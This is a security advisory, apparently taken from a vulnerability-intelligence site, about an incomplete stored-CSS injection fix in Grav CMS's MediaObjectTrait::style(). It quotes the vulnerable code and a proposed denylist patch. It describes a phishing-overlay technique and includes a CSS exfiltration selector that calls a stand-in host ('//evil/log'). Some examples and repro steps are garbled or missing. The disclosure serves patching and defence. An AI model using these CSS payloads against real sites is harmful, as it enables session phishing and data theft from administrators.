Deploy autonomous AI agents that reason, exploit, and validate complex vulnerability chains — not another scanner, an agentic system that thinks like a senior pentester.
CVE-2026-55890 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
The fix for GHSA-r7fx-8g49-7hhr / CVE-2026-42841 (Stored XSS via Markdown media attribute() action) is incomplete. The maintainer patched MediaObjectTrait::attribute() to deny dangerous attribute names (event handlers, style, xmlns, srcdoc, formaction) but the sibling MediaObjectTrait::style() method is reachable through the same Markdown excerpt-action pipeline and writes editor-controlled strings straight into the rendered <img style="…"> attribute with no sanitization.
Any user with admin.pages permission (e.g. an editor) can save Markdown like:
which renders to a stored-CSS payload that any higher-privileged viewer (administrator, super-admin, reviewer) loads in their authenticated session. Same trust boundary, same victim, same attacker, same Markdown input vector as the patched GHSA-r7fx-8g49-7hhr issue — the fix simply patched the attribute() entry point and missed the style() sibling.
Vulnerable at HEAD across every currently-shipping branch (verified 2026-06-15):
| Branch / tag | MediaObjectTrait::style() |
|---|---|
| develop (f4c0f42) | unpatched |
| 2.0 (96e1d2d) | unpatched |
| 2.0.0-rc.8 (latest 2.0 RC tag) | unpatched |
| 1.7.52 (latest 1.7 stable) | unpatched |
Per SECURITY.md, this advisory targets the 2.0 line (publisher-level exploit, not eligible for 1.7 backport per the project's stated policy).
Per the project's SECURITY.md:
A vulnerability is when an actor can escape the trust scope of their role: a publisher whose stored content compromises an admin session, an unauthenticated visitor who reaches a privileged sink, an account at any tier that gains capabilities it was not granted.
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.
An editor authoring Markdown is operating within their role. A higher-privilege admin loading that editor's page in their authenticated session and getting attacker-controlled CSS painted into their browser is across the trust boundary — the same framing that was accepted for GHSA-r7fx-8g49-7hhr (MODERATE) and GHSA-c2q3-p4jr-c55f (MODERATE).
5a12f9be8, 2026-04-23)public function attribute($attribute = null, $value = '')
{
if (empty($attribute) || !is_string($attribute)) {
return $this;
}
if (!self::isSafeAttributeName($attribute)) {
return $this;
}
$this->attributes[$attribute] = $value;
return $this;
}
private static function isSafeAttributeName(string $name): bool
{
if (!preg_match('/^[A-Za-z][A-Za-z0-9_:.\-]*$/', $name)) {
return false;
}
$lower = strtolower($name);
if (str_starts_with($lower, 'on')) { // event handlers
return false;
}
$denylist = ['style', 'xmlns', 'srcdoc', 'formaction'];
return !in_array($lower, $denylist, true);
}
style is the second-named entry on the denylist — the maintainer explicitly recognised that editor-supplied style was dangerous when arriving via the attribute() action. The fix simply didn't reach the parallel sink.
MediaObjectTrait::style() (line 519)/**
* Allows to add an inline style attribute from Markdown or Twig
* Example: 
*/
public function style($style)
{
$this->styleAttributes[] = rtrim($style, ';') . ';';
return $this;
}
The function is unchanged before, during, and after the GHSA-r7fx-8g49-7hhr fix. The PHPDoc on the very next line names the Markdown invocation form (?style=…). The rtrim is for clean concatenation, not security.
$styleAttributes is concatenated and assigned to attributes['style'] in parsedownElement() (lines 242–251):
$style = '';
foreach ($this->styleAttributes as $key => $value) {
if (is_numeric($key)) { // editor-supplied entries are numeric-keyed
$style .= $value;
} else {
$style .= $key . ': ' . $value . ';';
}
}
if ($style) {
$attributes['style'] = $style;
}
Parsedown then runs htmlspecialchars on the value (so quote-breakout into a new attribute is blocked), but arbitrary CSS as the value is enough.
The Markdown processor wires query-string keys to method calls on the Medium object (system/src/Grav/Common/Page/Markdown/Excerpts.php:262):
foreach ($actions as $action) {
$matches = [];
if (preg_match('/\[(.*)\]/', (string) $action['params'], $matches)) {
$args = [explode(',', $matches[1])];
} else {
$args = explode(',', (string) $action['params']);
}
$medium = call_user_func_array([$medium, $action['method']], $args);
}
?style=position:fixed;top:0;left:0 becomes $medium->style('position:fixed;top:0;left:0').
AdminController::savePage() runs Security::detectXssFromArray() on data[content] before persisting (classes/plugin/AdminController.php:1402). All five default patterns miss the Markdown form:
on_events: requires <…on*= in source.invalid_protocols: requires javascript:/data:/etc. — the phishing-overlay payload uses none.moz_binding: requires -moz-binding: literally.html_inline_styles: requires <…style=…(url:|x:expression); Markdown source has no < and no url:.dangerous_tags: requires <svg/<script/etc.Save proceeds, the payload persists, the CSS is rendered to every viewer.
position:fixed covering the admin UI with attacker-controlled background/content; admin clicks intended actions into the attacker's overlay.input[value^="a"] { background: url(//evil/log?c=a) } against form fields the higher-privileged viewer interacts with.position:fixed; background:white covers the page until the offending content is removed by hand on the server.The stored payload reaches every user who views the editor's page — including administrators previewing pending changes.
A deterministic end-to-end PoC against a real Grav install ships with the finding (repro.sh). Steps:
admin.pages + admin.pages.update, no admin.super)..<img style="…"> carrying the unsanitised CSS.Apply the same denylist + identifier-shape gate to style() that isSafeAttributeName() enforces for attribute():
public function style($style)
{
+ if (!is_string($style) || !self::isSafeStyleValue($style)) {
+ return $this;
+ }
$this->styleAttributes[] = rtrim($style, ';') . ';';
return $this;
}
+/**
+ * Editor-controlled style values arrive via Markdown `?style=…` and reach
+ * the rendered `<img style="…">` attribute verbatim. Limit to a conservative
+ * set of CSS that themes legitimately use from content (sizing, float,
+ * margin, etc.) and reject anything that opens a phishing-overlay or
+ * data-exfil primitive. Matches the spirit of the attribute() denylist
+ * from GHSA-r7fx-8g49-7hhr — same trust boundary, sibling sink.
+ */
+private static function isSafeStyleValue(string $css): bool
+{
+ $css = strtolower($css);
+ // Deny: phishing-overlay positioning, CSS-selector exfil sinks
+ // (background/content url(...)), expression() (legacy IE),
+ // -moz-binding (legacy FF), behavior: url() (IE).
+ $deny = ['position:', '@import', 'url(', 'expression(',
+ '-moz-binding', 'behavior:', 'z-index:', 'fixed', 'absolute'];
+ foreach ($deny as $needle) {
+ if (str_contains($css, $needle)) {
+ return false;
+ }
+ }
+ return (bool) preg_match('/^[A-Za-z0-9 :;%.,\-#\/]*$/', $css);
+}
Alternatively, deprecate the Markdown ?style=… action entirely — themes can still set inline styles from PHP, but accepting attacker-controlled CSS from page content was always a footgun.
Defense in depth: extend Security::detectXss()'s html_inline_styles rule to also match Markdown-form ?style= query parameters in data[content] on save.
5a12f9be8 (system/src/Grav/Common/Media/Traits/MediaObjectTrait.php)system/src/Grav/Common/Media/Traits/MediaObjectTrait.php lines 519–524SECURITY.md (trust-boundary severity model)